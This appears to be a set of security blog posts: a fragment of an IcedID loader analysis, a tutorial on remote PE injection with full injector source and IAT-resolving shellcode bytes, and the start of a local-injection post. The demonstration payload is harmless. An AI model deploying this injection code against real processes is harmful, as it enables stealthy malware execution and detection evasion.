        rollNumber = bytesToRoll & 0x7;
        bytesToRoll = pXORBytes[xorBytesIndex2];

        __asm {
            push ecx
            push ebx

            mov cl, rollNumber
            mov ebx, bytesToRoll

            ror ebx, cl
            mov bytesToRoll, ebx


            pop ecx
            pop ebx
        }

        pXORBytes[xorBytesIndex2] = ++bytesToRoll;

    }

    return 0;
}

Decoding Function for Licence.dat

Once decoded the licence.dat file can be separated into the following parts:

Red: The first 0x81 bytes in the file are skipped and not used.
Green: Contains the PE header data, the organization of these header attributes is specific to IcedID and does not follow a traditional PE header format.
Purple: Beginning of the data sections.

Format of the Decoded Licence.dat

The headerless PE data structure can be represented using the following struct. Only the minimum required fields are present which are used to find the associated sections, map them to memory, and then begin execution of the entrypoint.

struct PEHeader {
    ULONGLONG ImageBase;
    DWORD SizeOfImage;
    DWORD AddressOfEntryPoint;
    DWORD IATRva;
    DWORD BaseRelocationRVA;
    DWORD BaseRelocationSize;
    DWORD NumberOfSections;
};

PE Header in Headerless IcedID File

The section headers begin right after the PEHeader struct. There are a total of PEHeader->NumberOfSections number of sections, each having the size of 0x11 bytes.

struct SectionHeader {
    DWORD VirtualAddress;
    DWORD VirtualSize;
    DWORD PointerToRawData;
    DWORD SizeOfRawData;
    BYTE SectionPageProtection;
};

Section Headers in Headerless IcedID File

Finally, after the section headers finish the raw data of each section begins - just like in regular PE files.

During this analysis a decoder was created to convert the licence.dat file into a regular PE file in order to facilitate further static analysis. This Github repository has the source code.

The main functions of the decoder are:

Load the licence.dat file from disk.
Decode the licence.dat file in memory.
Parse the PE headers and Section headers.
Rebuild a valid PE file based on the parsed headers.

The following is a example video of the decoder in action:

Vote32.tmp

Vote32.tmp is the file that comes after licence.dat in the second stage download. Vote32.tmp is a DLL file that acts as a loader for the licence.dat. The first time IcedID executes, licence.dat will be loaded and run by the first stage. However, the core module will establish persistence in the form of a scheduled task and use Vote32.tmp to load and run the licence.dat file.

The following is an example of the persistence that the core module will setup, the DLL being executed is a copy of Vote32.tmp that takes the licence.dat as input.

IcedID Core Module Persistence

Execution of Core Module

Once the customized IcedID core module header has been parsed and the sections themselves have been mapped into memory, execution of the module can begin by entering the entrypoint of the file.

Entry into Core IcedID Module Entrypoint

Remote Portable Executable Injection

Aleks — Wed, 24 May 2023 17:56:04 GMT

Introduction

This post will introduce the concept of injecting PE files into a remote process. Previously, local PE injection was discussed. However, the same technique can be altered to inject code into another remote process on the same system.

This post will describe the core injection logic and the payload that will be injected into another process, along with a potential solution of how to deal with the challenge of resolving the Import Address Table (IAT) in a remote memory address space.

Source Code for Examples

The associated code example for this post can be found on the following link.

Payload

The payload for this example will send a HTTP request to Google. This was chosen so that the payload is simple and there is visual feedback that can be seen when the payload is running. Below the sendHTTPRequest function is responsible for sending the HTTP request.

int sendHTTPRequest() {

        LPCSTR userAgent = "agent";
        LPCSTR connectDomain = "google.com";
        LPCSTR httpRequestType = "GET";
        LPCSTR targetPath = "/test";

        HINTERNET internetHandle = InternetOpenA(userAgent, INTERNET_OPEN_TYPE_DIRECT, NULL, NULL, 0);
        if (internetHandle == NULL) {
                return -1;
        }

        DWORD_PTR dwService = (DWORD_PTR)NULL;

        HINTERNET httpHandle = InternetConnectA(internetHandle, connectDomain, INTERNET_DEFAULT_HTTP_PORT, NULL, NULL, INTERNET_SERVICE_HTTP, 0, dwService);
        if (httpHandle == NULL) {
                return -1;
        }

        HINTERNET httpRequestHandle = HttpOpenRequestA(httpHandle, httpRequestType, targetPath, NULL, NULL, NULL, 0, dwService);
        if (httpRequestHandle == NULL) {
                return -1;
        }

        BOOL result = HttpSendRequestA(httpRequestHandle, NULL, 0, NULL, 0);
        InternetCloseHandle(internetHandle);

        return 1;
}

HTTP Request Function that acts as our "Payload'

The loopHTTPConnect function will be responsible for looping through the sendHTTPRequest function every two seconds.

void loopHTTPConnect() {

        while (true) {
                Sleep(2000);
                sendHTTPRequest();
                printf("Sent HTTP Request\n");
        }

}

Function that loops through the "Payload" function

The loopHTTPConnect function will be invoked from the programs main() function. This is a standard executable file that can be run directly in Windows, however, our goal is to run it inside of a injector without directly invoking it.

int main() {

        printf("HTTP Payload Sending Starting\n");
        loopHTTPConnect();
}

The Payloads Main Function

Import Address Table Fixing Shellcode

When a payload has an Import Address Table (IAT) a challange arises, we need to resolve the IAT in the target process where it is going to be executed.

Wait, why can't we resolve the IAT before injecting into a process?

When we resolve an IAT, at the core we are loading DLL's into the process and updating values that point to various functions in that DLL.

This process needs to be completed in the process where the payload will be executed, in this case it would be the remote process. Due to Address Space Layout Randomization (ASLR) DLL's will have different base addresses. This means if we resolve the IAT before injecting the addresses that point to functions will be incorrect, and likely the DLL's they should point to won't even be loaded.

There are some edge cases, if the payload does not have an IAT then this is not an issue. More over, if the only DLL's the process imports from are Kernel32.dll and User32.dll then we have nothing to worry about either. This is because Kernel32.dll and User32.dll have the same base address system wide.

To deal with this challenge we will have two different paths of injection depending on if a payload has an IAT:

Payload Has IAT
- Inject mapped payload into target process
- Inject IAT Fixing Shellcode into target process
- Invoke IAT Fixing Shellcode

Payload Does Not Have IAT
- Inject mapped payload into target process
- Invoke mapped payload entrypoint

With this approach if the payload has an IAT we will indirectly invoke the payload via shellcode that has been injected into the same target process. This shellcode will have the capability to resolve all the entries in the IAT and then redirect its own execution to the entrypoint of the payload.

To construct the IAT fixing shellcode a new exported function was created in fresh Visual Studio project. An exported function was used so the complier keeps all the code in this single function. This function will also take one parameter, this will be the address of the mapped payload.

__declspec(dllexport) void PositionIndependentIATResolver(const ULONG_PTR mappedPEFile)

Exported IAT Resolver Function

Why is this function made as an exported function?

Our core goal is to make a independent function that is not dependent on any part of the compiled program. Once this is done the entire function bytes can be copied and executed.

There are many different ways to approach this, in this case the exported function was declared to ensure the compiler does not optimize the function out.

To start the shellcode will locate the offset of Kernel32.dll. String hashing will be used to avoid any hardcoded strings in the process.

        // Through PEB find the base address of Kernel32.dll

        _PPEB pPEB = (_PPEB)__readgsqword(0x60);
        PLDR_DATA_TABLE_ENTRY pCurrentPLDRDataTableEntry = (PLDR_DATA_TABLE_ENTRY)pPEB->pLdr->InMemoryOrderModuleList.Flink;
        PIMAGE_DOS_HEADER pKernel32Module = NULL;

        do {
                PWSTR currentModuleString = pCurrentPLDRDataTableEntry->BaseDllName.pBuffer;
                if (GetHashFromStringW(currentModuleString) == KERNEL32DLL_HASH) {
                        pKernel32Module = (PIMAGE_DOS_HEADER)pCurrentPLDRDataTableEntry->DllBase;
                        break;
                }

                pCurrentPLDRDataTableEntry = (PLDR_DATA_TABLE_ENTRY)pCurrentPLDRDataTableEntry->InMemoryOrderModuleList.Flink;

        } while (pCurrentPLDRDataTableEntry->TimeDateStamp != 0);

        if (pKernel32Module == NULL) {
                return;
        }

Find Kernel32 Base Address

Once the offset of Kernel32.dll is found the LoadLibraryA and GetProcAddress function will be resolved. We require these functions to load DLLs and resolve functions when constructing the IAT table.

        // Resolve LoadLibraryA and GetProcAddress (Adding here so compiler does not redirect to another function
        LOADLIBRARYA pLoadLibraryAAddress = NULL;
        GETPROCADDRESS pGetProcAddressAddress = NULL;

        PIMAGE_NT_HEADERS64 ntHeaders = (PIMAGE_NT_HEADERS64)(pKernel32Module->e_lfanew + (LPBYTE)pKernel32Module);
        PIMAGE_OPTIONAL_HEADER64 optionalHeader = (PIMAGE_OPTIONAL_HEADER64)& ntHeaders->OptionalHeader;
        DWORD imageExportDirectoryRVA = optionalHeader->DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress;

        PIMAGE_EXPORT_DIRECTORY kernel32ExportDirectory = (PIMAGE_EXPORT_DIRECTORY)(imageExportDirectoryRVA + (LPBYTE)pKernel32Module);
        PDWORD addressOfNames = (PDWORD)(kernel32ExportDirectory->AddressOfNames + (LPBYTE)pKernel32Module);
        PWORD ordinalTable = (PWORD)(kernel32ExportDirectory->AddressOfNameOrdinals + (LPBYTE)pKernel32Module);
        PDWORD addressOfFunctions = (PDWORD)(kernel32ExportDirectory->AddressOfFunctions + (LPBYTE)pKernel32Module);

        for (DWORD i = 0; i < kernel32ExportDirectory->NumberOfNames; i++) {
                LPSTR currentFunctionName = (LPSTR)(addressOfNames[i] + (LPBYTE)pKernel32Module);

                if (GetHashFromStringA(currentFunctionName) == GETPROCADDRESS_HASH) {
                        pGetProcAddressAddress = (GETPROCADDRESS)(addressOfFunctions[ordinalTable[i]] + (LPBYTE)pKernel32Module);
                }

                if (GetHashFromStringA(currentFunctionName) == LOADLIBRARYA_HASH) {
                        pLoadLibraryAAddress = (LOADLIBRARYA)(addressOfFunctions[ordinalTable[i]] + (LPBYTE)pKernel32Module);
                }

                // If both are resolved we can exit the loop
                if (pLoadLibraryAAddress != NULL && pGetProcAddressAddress != NULL) {
                        break;
                }

        }

        if (pLoadLibraryAAddress == NULL || pGetProcAddressAddress == NULL) {
                return;
        }

Resolve Required Win32 API Functions via API Hashing

Next, comes the process of resolving the IAT table. The following will loop through each entry in the IAT, load a DLL if required, and resolve the address of any function that the program may require during its execution.

        /*
        Step 2: Resolve the IAT
        */

        PIMAGE_NT_HEADERS64 pMappedCurrentDLLNTHeader = (PIMAGE_NT_HEADERS64)(((PIMAGE_DOS_HEADER)mappedPEFile)->e_lfanew + (LPBYTE)mappedPEFile);
        PIMAGE_IMPORT_DESCRIPTOR pMappedCurrentDLLImportDescriptor = (PIMAGE_IMPORT_DESCRIPTOR)(pMappedCurrentDLLNTHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress + (LPBYTE)mappedPEFile);

        while (pMappedCurrentDLLImportDescriptor->Name != NULL) {
                LPSTR currentDLLName = (LPSTR)(pMappedCurrentDLLImportDescriptor->Name + (LPBYTE)mappedPEFile);
                HMODULE hCurrentDLLModule = pLoadLibraryAAddress(currentDLLName);

                PIMAGE_THUNK_DATA64 pImageThunkData = (PIMAGE_THUNK_DATA64)(pMappedCurrentDLLImportDescriptor->FirstThunk + (LPBYTE)mappedPEFile);

                while (pImageThunkData->u1.AddressOfData) {

                        if (pImageThunkData->u1.Ordinal & 0x8000000000000000) {
                                // Import is by ordinal

                                FARPROC resolvedImportAddress = pGetProcAddressAddress(hCurrentDLLModule, MAKEINTRESOURCEA(pImageThunkData->u1.Ordinal));

                                if (resolvedImportAddress == NULL) {
                                        return;
                                }

                                // Overwrite entry in IAT with the address of resolved function
                                pImageThunkData->u1.AddressOfData = (ULONGLONG)resolvedImportAddress;

                        }
                        else {
                                // Import is by name
                                PIMAGE_IMPORT_BY_NAME pAddressOfImportData = (PIMAGE_IMPORT_BY_NAME)((pImageThunkData->u1.AddressOfData) + (LPBYTE)mappedPEFile);
                                FARPROC resolvedImportAddress = pGetProcAddressAddress(hCurrentDLLModule, pAddressOfImportData->Name);

                                if (resolvedImportAddress == NULL) {
                                        return;
                                }

                                // Overwrite entry in IAT with the address of resolved function
                                pImageThunkData->u1.AddressOfData = (ULONGLONG)resolvedImportAddress;

                        }

                        pImageThunkData++;
                }

                pMappedCurrentDLLImportDescriptor++;
        }

Resolve the IAT Table

Finally, after the IAT is fixed up the shellcode will redirect its execution to the main payload by calling the entrypoint. This will ensure that the thread created for the IAT shellcode is reused to execute the payload as well.

        /*
        Step 3: Jump to the entrypoint of the payload
        */

        void (*pEntryPoint)(void) = (void (*)()) (pMappedCurrentDLLNTHeader->OptionalHeader.AddressOfEntryPoint + (LPBYTE)mappedPEFile);
        pEntryPoint();
}

Jump to the Payload Entrypoint

Once the code was written and compiled in Visual Studio the function was located in IDA. Since this function was designed to be position independent and not dependent on anything hardcoded the raw code bytes can be copied out to use as shellcode.

PositionIndependentIATResolver Function Copied from IDA as Raw Bytes

The following Python script was used to create a valid C syntax array so the shellcode can be added to any software that will require it.

shellcode = "41574883EC4065488B0425600000004C8BF9488B50184C8B5A20660F1F4400004D8B53504533C0664539027410498BC249FFC0488D40026683380075F333D2448D4A354D85C074300F1F840000000000410FB70C5248FFC24169C19EF2100003C881E1FFFFFF004403C9493BD072E14181F967400C0574114D8B1B41837B7000759E4883C440415FC348895C2450498B5B204885DB0F84F10100004863433C48896C2460488974246833F648897C24388B8C18880000004803CB4C896424304C896C24284533E44C897424204533F68B41188B69208B79244803EB448B691C4803FB4C03EB8944245885C00F847D0100000F1F40006666660F1F840000000000448B550033D24C03D3450FB61A4584DB741A498BC26666660F1F84000000000048FFC2488D400180380075F44533C041B9350000004885D27439660F1F440000430FBE0C1049FFC04169C19EF2100003C881E1FFFFFF004403C94C3BC272E14181F99DE0A305750B0FB707418B7485004803F333D24584DB7412498BC20F1F0048FFC2488D400180380075F44533C041B9350000004885D27439660F1F440000430FBE0C1049FFC04169C19EF2100003C881E1FFFFFF004403C94C3BC272E14181F941F26906750B0FB707458B6485004C03E34D85E474054885F6751641FFC64883C5044883C702443B7424580F820DFFFFFF4D85E474764885F6747149636F3C468BB43D900000004983C60C4D03F7418B0685C0744D8BC84903CF41FFD4418B5E04488BF84903DF488B0B4885C9742779050FB7D1EB07498D57024803D1488BCFFFD64885C074254889034883C308488B0B4885C975D9418B46144983C61485C075B3428B443D284903C7FFD04C8B6C24284C8B642430488B7C2438488B742468488B6C24604C8B742420488B5C24504883C440415FC3"

formatted_bytes = []

for byte_index in range(0,len(shellcode),2):

    current_byte = "0x" + str(shellcode[byte_index:byte_index+2])
    formatted_bytes.append(current_byte)

shellcode_length = len(formatted_bytes)

print("BYTE iatFixShellArray[] = { ", end='')
for index, shellcode_byte in enumerate(formatted_bytes):
    print(shellcode_byte, end='')

    # Ensure we don't print a ',' at the very end
    if index != (shellcode_length - 1):
        print(",", end='')

print(" };")
print("SIZE_T iatFixShellArrayLength = {};\n".format(shellcode_length));

Create C Array from Raw Bytes

The output of the above Python script can be seen below.

Shellcode in C Array

Remote Portable Executable Injector

The remote portable executable injector will be responsible for injecting the payload into another remote process. Optionally, if the payload has an IAT to construct, helper shellcode will be injected with the payload to perform this task.

Load the Target Payload

The first step is to read in the payload file from disk, this is achieved by using both CreateFileA to open, GetFileSize to allocate enough heap space via HeapAlloc, and reading the file into the heap space with ReadFile. The payload in this case is read from disk for example purposes, however, it is possible to download it from the network or any other location as well.

        HANDLE hExePayloadFile = CreateFileA(&(exePath[0]), GENERIC_READ, NULL, NULL, OPEN_EXISTING, NULL, NULL);
        if (hExePayloadFile == INVALID_HANDLE_VALUE) {
                std::cout << GetLastErrorAsString();
                return -1;
        }

        DWORD exePayloadFileSize = GetFileSize(hExePayloadFile, NULL);
        if (exePayloadFileSize == INVALID_FILE_SIZE) {
                std::cout << GetLastErrorAsString();
                return -1;
        }

        PIMAGE_DOS_HEADER pExePayloadUnmapped = (PIMAGE_DOS_HEADER)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, exePayloadFileSize);
        if (pExePayloadUnmapped == NULL) {
                std::cout << GetLastErrorAsString();
                return -1;
        }

        if (!ReadFile(hExePayloadFile, pExePayloadUnmapped, exePayloadFileSize, NULL, NULL)) {
                std::cout << GetLastErrorAsString();
                return -1;
        }

        CloseHandle(hExePayloadFile);

Reading the Payload from Disk into Memory

Map the Target Payload

The next step is to map the payload, this is required as to execute the file it must be stored in a virtual memory representation rather than an on-disk representation. To start we allocate enough heap space to store the mapped PE file.

        // Allocate new heap space for mapped executable

        PIMAGE_NT_HEADERS64 pExePayloadNTHeaders = (PIMAGE_NT_HEADERS64)(pExePayloadUnmapped->e_lfanew + (LPBYTE)pExePayloadUnmapped);

        PIMAGE_DOS_HEADER pExePayloadMapped = (PIMAGE_DOS_HEADER)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, pExePayloadNTHeaders->OptionalHeader.SizeOfImage);
        if (pExePayloadUnmapped == NULL) {
                std::cout << GetLastErrorAsString();
                return -1;
        }

Allocate a Buffer for the Mapped Version of the Payload

Next, the PE headers are copied directly to the newly allocated buffer space. There are no changes required to the headers.

        // Copy headers to mapped memory space

        DWORD totalHeaderSize = pExePayloadNTHeaders->OptionalHeader.SizeOfHeaders;
        memcpy_s(pExePayloadMapped, totalHeaderSize, pExePayloadUnmapped, totalHeaderSize);

Copy the PE Headers into Buffer

After, the PE sections are copied over. When copying the PE sections the virtual address offset is used to figure out the destination in which the PE section should be present in, rather than the raw offset that is used when the file is on disk.

        // Map PE sections into mapped memory space

        DWORD numberOfSections = pExePayloadNTHeaders->FileHeader.NumberOfSections;
        PIMAGE_SECTION_HEADER pCurrentSection = (PIMAGE_SECTION_HEADER)(pExePayloadNTHeaders->FileHeader.SizeOfOptionalHeader + (LPBYTE) & (pExePayloadNTHeaders->OptionalHeader));

        for (DWORD i = 0; i < numberOfSections; i++, pCurrentSection++) {

                if (pCurrentSection->SizeOfRawData != 0) {
                        LPBYTE pSourceSectionData = pCurrentSection->PointerToRawData + (LPBYTE)pExePayloadUnmapped;
                        LPBYTE pDestinationSectionData = pCurrentSection->VirtualAddress + (LPBYTE)pExePayloadMapped;
                        DWORD sectionSize = pCurrentSection->SizeOfRawData;

                        memcpy_s(pDestinationSectionData, sectionSize, pSourceSectionData, sectionSize);
                }
        }

Copy PE Sections into Buffer by Virtual Address Offset

Allocate Memory in Target Process

Next, a process handle is opened to the process we would like to inject into. In this example notepad is used.

        // Find PID of Target Process
        LPCWSTR injectionTargetProcess = L"notepad.exe";
        DWORD injectionTargetProcessID = FindProcessID((LPWSTR)injectionTargetProcess);

        if (injectionTargetProcessID == -1) {
                wprintf(L"Could not find process: %ls", injectionTargetProcess);
                return 0;
        }

        wprintf(L"Injecting into %ls (%d)\n", injectionTargetProcess, injectionTargetProcessID);

        HANDLE hTargetProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, injectionTargetProcessID);
        if (hTargetProcess == NULL) {
                std::string errorMessage = GetLastErrorAsString();
                std::cout << "Failed to aquire handle to process: " << errorMessage << "\n";
                return -1;
        }

Allocate Memory in Remote Process

VirtualAllocEx is used to allocate a buffer in notepad process. This buffer is made readable, writable, and executable in order to be able to write the payload and execute it in the remote process.

One of the main reasons for performing this allocate at this stage is that when fixing the Base Relocation table it is critical to have the offset a PE file will be located at. In this case the offset is stored in pRemoteMappedBuffer.

        LPVOID pRemoteMappedBuffer = VirtualAllocEx(hTargetProcess, NULL, pExePayloadNTHeaders->OptionalHeader.SizeOfImage, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
        if (pRemoteMappedBuffer == NULL) {
                std::string errorMessage = GetLastErrorAsString();
                std::cout << errorMessage << "\n";
                return -1;
        }

Allocate Memory in Remote Process for the Payload

Update the Base Relocation Table

The Base Relocation Table will need to be updated in order to ensure that any hardcoded address in the DLL will resolve properly with the new base offset. Note, the updated value is in reference to the address we allocated with VirtualAllocEx.

        DWORD baseRelocationRVA = pExePayloadNTHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress;
        PIMAGE_BASE_RELOCATION pCurrentBaseRelocation = (PIMAGE_BASE_RELOCATION)(baseRelocationRVA + (LPBYTE)pExePayloadMapped);

        while (pCurrentBaseRelocation->VirtualAddress != NULL && baseRelocationRVA != 0) {

                DWORD relocationEntryCount = (pCurrentBaseRelocation->SizeOfBlock - sizeof(IMAGE_BASE_RELOCATION)) / sizeof(IMAGE_RELOC);
                PIMAGE_RELOC pCurrentBaseRelocationEntry = (PIMAGE_RELOC)((LPBYTE)pCurrentBaseRelocation + sizeof(IMAGE_BASE_RELOCATION));

                for (DWORD i = 0; i < relocationEntryCount; i++, pCurrentBaseRelocationEntry++) {
                        if (pCurrentBaseRelocationEntry->type == IMAGE_REL_BASED_DIR64) {

                                ULONGLONG* pRelocationValue = (ULONGLONG*)((LPBYTE)pExePayloadMapped + (ULONGLONG)((ULONGLONG)pCurrentBaseRelocation->VirtualAddress + pCurrentBaseRelocationEntry->offset));
                                ULONGLONG updatedRelocationValue = (ULONGLONG)((*pRelocationValue - pExePayloadNTHeaders->OptionalHeader.ImageBase) + (LPBYTE)pRemoteMappedBuffer);
                                *pRelocationValue = updatedRelocationValue;
                        }
                }

                // Increment current base relocation entry to the next one, we do this by adding its total size to the current offset
                pCurrentBaseRelocation = (PIMAGE_BASE_RELOCATION)((LPBYTE)pCurrentBaseRelocation + pCurrentBaseRelocation->SizeOfBlock);
        }

Update Base Relocation Table

Copy Mapped Payload to Target Process

Now that the PE file is mapped and has the Base Relocation Table fixed up, the entire mapped PE file can be copied over to the target process.

        if (!WriteProcessMemory(hTargetProcess, pRemoteMappedBuffer, (LPVOID)pExePayloadMapped, pExePayloadNTHeaders->OptionalHeader.SizeOfImage, NULL)) {
                std::string errorMessage = GetLastErrorAsString();
                std::cout << errorMessage << "\n";
                return -1;
        }

Injection of Payload

Injection with IAT Fixing Shellcode

If the PE payload has an IAT, it will need to be resolved inside of the remote process. This is because other DLL’s may need to be loaded, such s Wininet.dll, that the payload will depend on.

In this injection option if the PE payload has an IAT, optional IAT resolving shellcode will be injected into the target process. In this case we have our shellcode stored in iatFixShellArray. A new readable, writable, and executable buffer is created in the remote process to accommodate for this shellcode.

Once the shellcode is written to the remote process it can be invoke via CreateRemoteThread. One important aspact is the offset of the PE payload is passed to the shellcode. This is important as the shellcode will need to know where in memory the PE payload is located in order to fix the IAT of the payload.

After the shellcode is finished running, it will redirect execution to the PE payload in the same thread it was running.

        DWORD importDescriptorRVA = pExePayloadNTHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress;

        if (importDescriptorRVA != 0) {

                BYTE iatFixShellArray[] = { 0x41,0x57,0x48,0x83,0xEC,0x40,0x65,0x48,0x8B,0x04,0x25,0x60,0x00,0x00,0x00,0x4C,0x8B,0xF9,0x48,0x8B,0x50,0x18,0x4C,0x8B,0x5A,0x20,0x66,0x0F,0x1F,0x44,0x00,0x00,0x4D,0x8B,0x53,0x50,0x45,0x33,0xC0,0x66,0x45,0x39,0x02,0x74,0x10,0x49,0x8B,0xC2,0x49,0xFF,0xC0,0x48,0x8D,0x40,0x02,0x66,0x83,0x38,0x00,0x75,0xF3,0x33,0xD2,0x44,0x8D,0x4A,0x35,0x4D,0x85,0xC0,0x74,0x30,0x0F,0x1F,0x84,0x00,0x00,0x00,0x00,0x00,0x41,0x0F,0xB7,0x0C,0x52,0x48,0xFF,0xC2,0x41,0x69,0xC1,0x9E,0xF2,0x10,0x00,0x03,0xC8,0x81,0xE1,0xFF,0xFF,0xFF,0x00,0x44,0x03,0xC9,0x49,0x3B,0xD0,0x72,0xE1,0x41,0x81,0xF9,0x67,0x40,0x0C,0x05,0x74,0x11,0x4D,0x8B,0x1B,0x41,0x83,0x7B,0x70,0x00,0x75,0x9E,0x48,0x83,0xC4,0x40,0x41,0x5F,0xC3,0x48,0x89,0x5C,0x24,0x50,0x49,0x8B,0x5B,0x20,0x48,0x85,0xDB,0x0F,0x84,0xF1,0x01,0x00,0x00,0x48,0x63,0x43,0x3C,0x48,0x89,0x6C,0x24,0x60,0x48,0x89,0x74,0x24,0x68,0x33,0xF6,0x48,0x89,0x7C,0x24,0x38,0x8B,0x8C,0x18,0x88,0x00,0x00,0x00,0x48,0x03,0xCB,0x4C,0x89,0x64,0x24,0x30,0x4C,0x89,0x6C,0x24,0x28,0x45,0x33,0xE4,0x4C,0x89,0x74,0x24,0x20,0x45,0x33,0xF6,0x8B,0x41,0x18,0x8B,0x69,0x20,0x8B,0x79,0x24,0x48,0x03,0xEB,0x44,0x8B,0x69,0x1C,0x48,0x03,0xFB,0x4C,0x03,0xEB,0x89,0x44,0x24,0x58,0x85,0xC0,0x0F,0x84,0x7D,0x01,0x00,0x00,0x0F,0x1F,0x40,0x00,0x66,0x66,0x66,0x0F,0x1F,0x84,0x00,0x00,0x00,0x00,0x00,0x44,0x8B,0x55,0x00,0x33,0xD2,0x4C,0x03,0xD3,0x45,0x0F,0xB6,0x1A,0x45,0x84,0xDB,0x74,0x1A,0x49,0x8B,0xC2,0x66,0x66,0x66,0x0F,0x1F,0x84,0x00,0x00,0x00,0x00,0x00,0x48,0xFF,0xC2,0x48,0x8D,0x40,0x01,0x80,0x38,0x00,0x75,0xF4,0x45,0x33,0xC0,0x41,0xB9,0x35,0x00,0x00,0x00,0x48,0x85,0xD2,0x74,0x39,0x66,0x0F,0x1F,0x44,0x00,0x00,0x43,0x0F,0xBE,0x0C,0x10,0x49,0xFF,0xC0,0x41,0x69,0xC1,0x9E,0xF2,0x10,0x00,0x03,0xC8,0x81,0xE1,0xFF,0xFF,0xFF,0x00,0x44,0x03,0xC9,0x4C,0x3B,0xC2,0x72,0xE1,0x41,0x81,0xF9,0x9D,0xE0,0xA3,0x05,0x75,0x0B,0x0F,0xB7,0x07,0x41,0x8B,0x74,0x85,0x00,0x48,0x03,0xF3,0x33,0xD2,0x45,0x84,0xDB,0x74,0x12,0x49,0x8B,0xC2,0x0F,0x1F,0x00,0x48,0xFF,0xC2,0x48,0x8D,0x40,0x01,0x80,0x38,0x00,0x75,0xF4,0x45,0x33,0xC0,0x41,0xB9,0x35,0x00,0x00,0x00,0x48,0x85,0xD2,0x74,0x39,0x66,0x0F,0x1F,0x44,0x00,0x00,0x43,0x0F,0xBE,0x0C,0x10,0x49,0xFF,0xC0,0x41,0x69,0xC1,0x9E,0xF2,0x10,0x00,0x03,0xC8,0x81,0xE1,0xFF,0xFF,0xFF,0x00,0x44,0x03,0xC9,0x4C,0x3B,0xC2,0x72,0xE1,0x41,0x81,0xF9,0x41,0xF2,0x69,0x06,0x75,0x0B,0x0F,0xB7,0x07,0x45,0x8B,0x64,0x85,0x00,0x4C,0x03,0xE3,0x4D,0x85,0xE4,0x74,0x05,0x48,0x85,0xF6,0x75,0x16,0x41,0xFF,0xC6,0x48,0x83,0xC5,0x04,0x48,0x83,0xC7,0x02,0x44,0x3B,0x74,0x24,0x58,0x0F,0x82,0x0D,0xFF,0xFF,0xFF,0x4D,0x85,0xE4,0x74,0x76,0x48,0x85,0xF6,0x74,0x71,0x49,0x63,0x6F,0x3C,0x46,0x8B,0xB4,0x3D,0x90,0x00,0x00,0x00,0x49,0x83,0xC6,0x0C,0x4D,0x03,0xF7,0x41,0x8B,0x06,0x85,0xC0,0x74,0x4D,0x8B,0xC8,0x49,0x03,0xCF,0x41,0xFF,0xD4,0x41,0x8B,0x5E,0x04,0x48,0x8B,0xF8,0x49,0x03,0xDF,0x48,0x8B,0x0B,0x48,0x85,0xC9,0x74,0x27,0x79,0x05,0x0F,0xB7,0xD1,0xEB,0x07,0x49,0x8D,0x57,0x02,0x48,0x03,0xD1,0x48,0x8B,0xCF,0xFF,0xD6,0x48,0x85,0xC0,0x74,0x25,0x48,0x89,0x03,0x48,0x83,0xC3,0x08,0x48,0x8B,0x0B,0x48,0x85,0xC9,0x75,0xD9,0x41,0x8B,0x46,0x14,0x49,0x83,0xC6,0x14,0x85,0xC0,0x75,0xB3,0x42,0x8B,0x44,0x3D,0x28,0x49,0x03,0xC7,0xFF,0xD0,0x4C,0x8B,0x6C,0x24,0x28,0x4C,0x8B,0x64,0x24,0x30,0x48,0x8B,0x7C,0x24,0x38,0x48,0x8B,0x74,0x24,0x68,0x48,0x8B,0x6C,0x24,0x60,0x4C,0x8B,0x74,0x24,0x20,0x48,0x8B,0x5C,0x24,0x50,0x48,0x83,0xC4,0x40,0x41,0x5F,0xC3 };
                SIZE_T iatFixShellArrayLength = 664;


                LPVOID pIATFixShellcode = VirtualAllocEx(hTargetProcess, NULL, iatFixShellArrayLength, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
                if (pIATFixShellcode == NULL) {
                        std::string errorMessage = GetLastErrorAsString();
                        std::cout << errorMessage << "\n";
                        return -1;
                }

                if (!WriteProcessMemory(hTargetProcess, pIATFixShellcode, (LPVOID)iatFixShellArray, iatFixShellArrayLength, NULL)) {
                        std::string errorMessage = GetLastErrorAsString();
                        std::cout << errorMessage << "\n";
                        return -1;
                }

                HANDLE hRemoteThread = CreateRemoteThread(hTargetProcess, NULL, 0, (LPTHREAD_START_ROUTINE)pIATFixShellcode, pRemoteMappedBuffer, 0, NULL);
                if (hRemoteThread == NULL) {
                        std::string errorMessage = GetLastErrorAsString();
                        std::cout << errorMessage << "\n";
                        return -1;
                }
        }

Inject and Run the IAT Fixer Shellcode

Direct Injection

Alternately, if the PE payload does not have IAT then there is no need to inject the shellcode. A CreateRemoteThread can be used to invoke the entrypoint of PE payload.

        else if (importDescriptorRVA == 0) {

                LPTHREAD_START_ROUTINE pEntryPoint = (LPTHREAD_START_ROUTINE)(pExePayloadNTHeaders->OptionalHeader.AddressOfEntryPoint + (LPBYTE)pRemoteMappedBuffer);

                HANDLE hRemoteThread = CreateRemoteThread(hTargetProcess, NULL, 0, pEntryPoint, NULL, NULL, NULL);
                if (hRemoteThread == NULL) {
                        std::string errorMessage = GetLastErrorAsString();
                        std::cout << errorMessage << "\n";
                        return -1;
                }

        }

Run the Injected PE Entrypoint as a New Thread

Remote Portable Executable Injection Demonstration

The following GIF provides a video demonstration of the injection process. We can see the injector running and injecting into a Noteprocess (PID 2008). At the same time Process Hacker indicates there is some activity occurring with the threads of the process, and shortly after HTTP traffic starts flowing in Wireshark indicating a successful injection.

Injection Demonstration

Looking deeper into the Notepad process with Process Hacker we can see there is a section of memory that is readable, writable, and executable storing the bytes associated with the IAT fixing shellcode.

IAT Fixer Shellcode Injected

We can also see another readable, writable, and executable memory space that stores the PE payload.

Injected Payload

Local Portable Executable Injection

Aleks — Wed, 24 May 2023 17:46:32 GMT

This post will introduce the concept of injecting PE files into a local process. Previously, both DLL Injection and Reflective DLL Injection techniques were discussed to allow code execution in another process.

This technique will focus on the execution of a payload within a local process. The benefit of this technique over Reflective DLL Injection is that it does not require a DLL or any premade shellcode for execution.

